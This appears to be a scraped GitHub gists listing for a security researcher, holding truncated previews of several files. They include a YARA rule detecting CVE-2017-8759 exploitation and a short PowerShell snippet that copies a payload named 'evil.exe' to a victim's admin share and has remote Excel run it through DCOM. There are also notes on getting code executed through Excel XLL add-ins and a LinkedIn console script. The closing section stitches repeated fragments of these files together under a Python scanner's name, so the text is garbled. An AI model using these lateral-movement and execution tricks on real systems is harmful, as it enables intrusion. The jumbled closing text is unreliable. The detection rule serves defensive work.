Rich Warren rxwx

## CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
   meta:
      description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
      author = "Rich Warren @buffaloverflow"
      reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
      date = "2017-09-17"
   strings:
      $s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
   condition:
      $s1

## exploit.pptx

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rxwx
                / exploit.pptx
            
            
              Last active
              September 13, 2017 08:25
            
              
                CVE-2017-8759
              
          
            View raw
        
    
## foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

## get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in

function decodeHtml(html) {
    var txt = document.createElement("textarea");
    txt.innerHTML = html;
    return txt.value;
}

function httpGet(){

## cDefaultLaunchAttachmentPerms.md

      
              1 file
            
          
              1 fork
            
          
              1 comment
            
          
              1 star
            
          
                rxwx
                / cDefaultLaunchAttachmentPerms.md
            
            
              Last active
              June 8, 2022 11:06
            
              
                Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
              
          
    Description

This Gist documents the values of the HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\11.0\FeatureLockDown\cDefaultLaunchAttachmentPerms registry key in each version of Adobe Reader 11.0.10 -> 11.0.x
Value meanings

According to: https://www.adobe.com/devnet-docs/acrobatetk/tools/PrefRef/Windows/Attachments.html#idkeyname_1_2986
There are 3 possible values:

  
## Readme.md

      
              3 files
            
          
              3 forks
            
          
              0 comments
            
          
              1 star
            
          
                rxwx
                / Readme.md
            
            
              Last active
              May 4, 2023 14:19
            
          
    Notes

An XLL file is basically a DLL with some special features to make it work with Excel.
See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx
By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.
The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

  
## findhosts.py
#!/usr/bin/env python

import OpenSSL
from iptools import IpRangeList
import ssl
import socket
import sys
import argparse

def do_scan(range, csv=False):
	rule CVE_2017_8759_CRLF {
	meta:
	description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
	author = "Rich Warren @buffaloverflow"
	reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
	date = "2017-09-17"
	strings:
	$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
	condition:
	$s1
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
	# Windows 10 specific, but searches PATH so ..
	copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
	$excel.ActivateMicrosoftApp("5")
	# excel executes your binary :)
	// paste this in the chrome console and call findMemberID() when on a profile page
	// need to be logged in

	function decodeHtml(html) {
	var txt = document.createElement("textarea");
	txt.innerHTML = html;
	return txt.value;
	}

	function httpGet(){
	#!/usr/bin/env python

	import OpenSSL
	from iptools import IpRangeList
	import ssl
	import socket
	import sys
	import argparse

	def do_scan(range, csv=False):